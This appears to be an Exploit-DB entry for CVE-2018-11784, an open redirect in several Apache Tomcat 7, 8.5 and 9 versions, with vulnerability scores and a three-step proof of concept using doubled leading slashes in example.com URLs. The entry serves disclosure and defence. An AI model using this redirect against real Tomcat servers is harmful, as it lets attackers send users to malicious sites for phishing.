Lucene search

K
exploitdbCentral InfoSecEDB-ID:50118
HistoryJul 13, 2021 - 12:00 a.m.

Apache Tomcat 9.0.0.M1 - Open Redirect

2021-07-1300:00:00
Central InfoSec
www.exploit-db.com
534

5.7 Medium

AI Score

Confidence

High

0.791 High

EPSS

Percentile

98.3%

# Exploit Title: Apache Tomcat 9.0.0.M1 - Open Redirect
# Date: 10/04/2018
# Exploit Author: Central InfoSec
# Version: Apache Tomcat 9.0.0.M1 to 9.0.0.11, 8.5.0 to 8.5.33, and 7.0.23 to 7.0.90
# CVE : CVE-2018-11784

# Proof of Concept:

# Identify a subfolder within your application
http://example.com/test/

# Modify the URL to include at least 2 leading slashes before the subfolder and no trailing slash
http://example.com//test

# Browse to the newly created URL and the application will perform a redirection
http://test/